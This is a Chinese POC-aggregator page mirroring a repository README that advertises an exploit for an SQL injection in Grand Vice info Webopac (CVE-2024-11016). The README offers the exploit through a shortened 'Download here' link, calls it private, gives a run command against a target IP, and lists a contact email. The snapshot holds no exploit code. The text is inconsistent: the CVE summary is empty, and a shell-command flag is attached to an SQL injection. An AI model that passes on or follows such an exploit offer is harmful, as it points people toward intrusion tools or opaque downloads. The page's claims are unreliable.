POC详情: 2c1be638dd733de45f701bf161af018a191c77c8

来源
https://github.com/hatvix1/CVE-2024-11016
关联漏洞
标题: Grand Vice info Webopac SQL注入漏洞 (CVE-2024-11016)
描述:Grand Vice info Webopac是中国欣学英资讯(Grand Vice info)公司的一种在线公共访问目录。用于用户通过 Internet 使用图书馆的服务。 Grand Vice info Webopac存在SQL注入漏洞,该漏洞源于允许未认证的远程攻击者注入任意SQL命令来读取、修改和删除数据库内容。
描述
CVE-2024-11016-Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
介绍
# CVE-2024-11016-Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
# Overview
Webopac from Grand Vice info has a SQL Injection vulnerability, allowing unauthenticated remote attacks to inject arbitrary SQL commands to read, modify, and delete database contents.
# Exploit
## [**Download here**](https://bit.ly/40ITgwE) 
## Details 
+ **CVE ID**: CVE-2024-11016
+ **Published**: 11/11/2024
+ **Impact**: Confidentiality
+ **Exploit**: Availability: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
A vulnerability classified as critical was found in Grand Vice Info Webopac through 6.5.0/7.2.2. An unknown function is affected by this vulnerability. The manipulation of an unknown input leads to a sql injection vulnerability. This has an impact on confidentiality, integrity and availability. The summary of CVE is:
## Affected Versions
Webopac 6, Webopac 7
## Running
To run exploit you need Python 3.9. Execute:
```
python CVE-2024-11016.py -h 10.10.10.10 -c 'uname -a'
```
## [**Download here**](https://bit.ly/40ITgwE) 
## Contact
+ **For inquiries, please contact:brahmanskiy@outlook.com**
文件快照

 [4.0K]  /data/pocs/2c1be638dd733de45f701bf161af018a191c77c8
└── [1.1K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。